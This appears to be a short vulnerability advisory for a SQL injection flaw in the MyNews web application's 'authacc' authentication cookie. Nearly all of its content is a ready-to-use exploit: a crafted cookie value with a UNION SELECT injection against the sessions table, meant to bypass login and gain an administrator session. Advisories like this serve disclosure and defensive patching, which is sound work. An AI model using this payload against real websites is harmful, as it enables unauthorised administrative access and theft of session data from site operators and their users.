MyNews AuthACC SQL Injection Vulnerability

MyNews AuthACC SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

To exploit this issue, modify the following cookie variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin"